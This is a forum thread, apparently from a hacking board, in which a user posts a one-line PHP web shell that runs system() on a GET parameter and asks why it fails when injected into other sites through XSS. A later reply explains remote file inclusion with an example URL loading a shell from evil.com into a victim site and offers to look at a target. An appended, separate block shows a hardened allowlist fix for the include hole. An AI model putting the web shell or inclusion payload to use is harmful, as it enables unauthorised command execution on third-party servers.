
another bloody scripting problem!!


ghost's Avatar

this time I have made the following page:

<?php
$cmd=stripslashes($_GET["cmd"]);
system($cmd);
?>

To get the contents of the directory it is in I would put http://www.mysite.com/page.php?cmd=ls this would work fine as expected… (to go to the root directory I would type: http://www.mysite.com/page.php?cmd=ls+../../../) also as expected.
This works fine to navigate my server. The problem comes when using it in conjunction with XSS: it should load the code on the target vulnerable page! However, every time I have tried it I only get the contents of my server…

I have tried using iframes, img src=, embed etc. yet no luck

Any help would be great


ghost's Avatar

boost, cos this is bloody annoying me. Google knows nothing!


bl4ckc4t's Avatar
Banned

Sounds like no one knows what you're talking about or doesn't know how it's done.


ghost's Avatar

Basically I have found XSS vulnerable pages and when I try to enter:

<iframe src= "http://www.mysite.org/cmd.php?cmd=ls+"></iframe>

in the target site I should get the contents of their directory, but instead I get the contents of MY directory?!?

I have also tried other ways with little success


AldarHawk's Avatar
The Manager

it is strip_slashes() NOT stripslashes()


ghost's Avatar

oh yeah…dugh…lol

Anyway, it works with stripslashes instead of strip_slashes… but not remotely, if that makes any sense!


ghost's Avatar

Because an IFRAME is just like opening another browser window. The website you're on doesn't parse the information on the page, it just directs you to it. If, on the other hand, the page is like this: <? include($_GET['page']); ?> then simply upload your PHP code into a text file and include it like:

http://www.victim.com/?page=http://www.evil.com/shell.txt

Hope this helps. Maybe you can PM me with the site and I'll take a look for you.
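
Added example, not part of the thread: how the owner of a page built on include($_GET['page']) can close the hole described in the last post, by mapping the parameter onto a fixed allowlist instead of passing it to include. The directory name, page keys and file names are hypothetical.

```php
<?php
// Hardened replacement for: include($_GET['page']);
// Assumption: page files live in ./pages (hypothetical layout).
// Defence in depth: keep allow_url_include=Off in php.ini (the default),
// so include refuses http:// and ftp:// URLs even if a check is missed.

const PAGE_DIR = __DIR__ . '/pages';

// Hypothetical allowlist: request key => file on disk.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page($requested): ?string
{
    // ?page[]=x arrives as an array; reject anything that is not a string.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key match only: URLs, "../" sequences and null bytes never
    // reach the filesystem because they are not keys in PAGES.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    // Resolve symlinks and confirm the file still sits inside PAGE_DIR.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$path = resolve_page($_GET['page'] ?? 'home');
if ($path === null) {
    // Log the rejected value server-side; do not echo it back to the client.
    error_log('rejected page parameter: ' . json_encode($_GET['page'] ?? null));
    http_response_code(404);
    exit('Not found');
}
include $path;
```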